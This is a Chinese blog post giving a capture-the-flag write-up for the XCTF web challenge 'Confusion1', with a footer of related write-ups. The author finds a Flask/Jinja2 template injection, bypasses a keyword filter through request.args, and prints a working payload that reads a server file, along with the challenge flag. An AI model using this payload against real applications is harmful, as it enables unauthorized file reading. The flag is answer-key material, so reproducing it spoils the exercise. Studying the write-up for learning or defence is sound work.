攻防世界-web-Confusion1

最新推荐文章于 2024-04-09 16:45:15 发布
最新推荐文章于 2024-04-09 16:45:15 发布
阅读量180 收藏
点赞数
分类专栏: 安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuh2333/article/details/134478903
版权

1. 题目描述

打开链接,如图

点击Login和Rigister,都报错

但是有提示

指出了flag所在的位置,题目中直接能获取到的信息暂时就这么些了

2. 思路分析

既然告诉了我们flag文件的位置,那么要读取到这个文件,要么是任意文件下载,要么是命令注入。这里没有文件下载的接口,也没看到有任何外部输入,尝试扫描下:

发现存在/cgi-sys相关的借口,但是访问时发现报错:

说明此路不通。

网上查找资料发现题目中图片就给出了提示,可能是SSTI,试一下:

发现确实存在SSTI,那么这道题的思路就明确了:

利用SSTI读取flag文件中的内容

3. 解题过程

既然存在SSTI,我们试试常用的SSTI方法

试了下class,subclass,mro,常用方法都被过滤掉了,看能否找到一个没有被过滤的

request没过滤,那么我们考虑通过request.args的方式进行绕过,将class等被过滤的字符串设置成参数,传递给request.args,比如想要获取class,使用{{""[request.args.a]}}?a=__class__

那么我们现在需要读取文件/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt

正常的SSTI应该是:

{{"".__class__.__mro__[2].__subclasses__[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt').read()}}

利用request.args进行绕过就变成了:

{{""[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read

使用该请求,成功获取flag

flag为cyberpeace{24bc59019e22a893305a7496e638526f}

4. 总结

这道题考查的是SSTI的绕过(这个考查点的识别需要一定的知识积累)。SSTI也是非常灵活的一种注入方式,绕过方式很多,request算是常见的一种绕过手段,正好积累下经验

wuh2333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界 web高手进阶区 7分题Confusion1
闵行小鱼塘
10-11 2858
继续ctf的旅程,开始攻防世界web高手进阶区的7分题,本文是Confusion1的writeup
confusion-react:React Web应用程序
04-07
Create React App入门 该项目是通过引导的。 可用脚本 在项目目录中,可以运行: yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何...
攻防世界Confusion1
最新发布
wangzhemvp的博客
04-09 532
request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) "。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。php的标志是大象,Python的标志是蛇。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )输入 {{config}} 也有回显,ssti。过滤了关键字,并未过滤request。点进register.php。
攻防世界--Confusion1
m0_67467924的博客
05-30 293
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
攻防世界-Confusion1
m0_49025459的博客
02-14 624
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
在keras里面实现计算f1-score的代码
09-16
这里使用了`sklearn.metrics`库中的`confusion_matrix`、`f1_score`、`precision_score`和`recall_score`函数来计算这些指标。`val_predict`存储了预测值,`val_targ`是对应的验证数据的真实标签。计算得到的指标被...
Bootstrap-Project-Confusion:引导程序
05-09
- "Bootstrap-Project-Confusion-master"可能是一个GitHub仓库的名字,其中包含项目的源代码和说明文件,供学生下载、研究和修改。 这个项目对于初学者来说是很好的资源,因为它提供了实际操作的机会,帮助他们将...
React-Confusion
03-28
该项目是通过引导的。可用脚本在项目目录中,可以运行:yarn start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误。...
Absurd-Confusion
03-08
"Absurd-Confusion-master"这个文件名暗示着这可能是一个项目或库的主分支,包含了解决这类问题的源代码或者示例。 在Java编程中,可能会遇到一些看似荒谬的混乱情况,例如: 1. **类型转换异常**:Java是一种静态...
攻防世界----confusion1
qq_44418229的博客
07-22 1209
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界Confusion1
qq_43774856的博客
12-09 780
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界WEB】难度四星12分进阶题:Confusion1
07-23 726
攻防世界WEB】四星12分
【愚公系列】2023年05月 攻防世界-WebConfusion1)
时光隧道
05-27 7821
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
攻防世界 Confusion1
CyhDl666的博客
02-26 281
进入页面 index.php页面查看了源码,没有什么发现 进入Login.php页面 返回404??? 查看一下源码 从这里看可能是个SSTI模板注入 这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入 按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是 从这里来看应该是存在一个过滤 想到做过的SSTI题目 shrine用的是url_for函数 尝试一下 ...
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3601
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
xctf攻防世界 Web高手进阶区 Confusion1
l8947943的博客
12-30 1791
1. 直接进入场景,查看环境 2. 分析 映入眼帘的是神马奇葩玩意? 思考了一下,蟒蛇(Python)?大象(ElePHPant)?两个扭扯想说明啥?。。不懂 打开控制台,看看有没有提示 戳一戳链接,发现longin页面和register页面都有如下信息 emmm,按时flag的位置? blue-whale是什么破玩意? 点完后更加懵逼了,大胆猜测,需要审计源码,那么尝试.git漏洞,看能不能搞到源码,如图 得,没戏,看看robots.txt同样的显示,说明不能看到源码。 如何访问到提示的flag内
攻防世界web进阶区 Confusion1 之request.args.key
snowlyzz的博客
05-12 643
又是一道新知识点的题收获很大,现在刷的webctf题都是要依靠大佬的wp,唉,还是太菜了。 刚进页面就蒙蔽了,什么都不知道。扫了一下目录和git 没有任何线索。。 看了下师傅们的WP。 点进去index。php 可以看到报错, 看到url url的信息会在页面上看到,猜测是ssTI注入 具体可以看:SSTI注入查看下源 FLAG文件显示出位置 一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...
攻防世界 WEB Confusion1
qq_41696858的博客
08-26 171
这题其实跟php没关系,不要被hint给骗了,扫一波目录,就知道其实是用python开发的 emmm。。。找了一圈,没发现有什么有用的东西,看目录结构,盲猜是flask 既然是flask,之前做了好多SSTI,那么就试试,果然 {{7*7}}回显49,确实存在ssti 这题的主要考点其实是过SSTI的过滤,经测试,直接''.__class__被过滤了 需要换成{{''[request.args.a]}}?a=__class__其实就跟sql预处理差不多,做一个占位符,然后执行的时候通过参数具体赋值 既然找到
安装了scikit-learn 但 confusion_matrix标红
06-06
出现标红的情况通常是因为你的编辑器或IDE没有正确地识别`confusion_matrix`函数。这可能是因为你没有正确地导入`confusion_matrix`函数或者你的编辑器或IDE没有正确地识别导入的库。 你可以尝试在代码中添加以下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值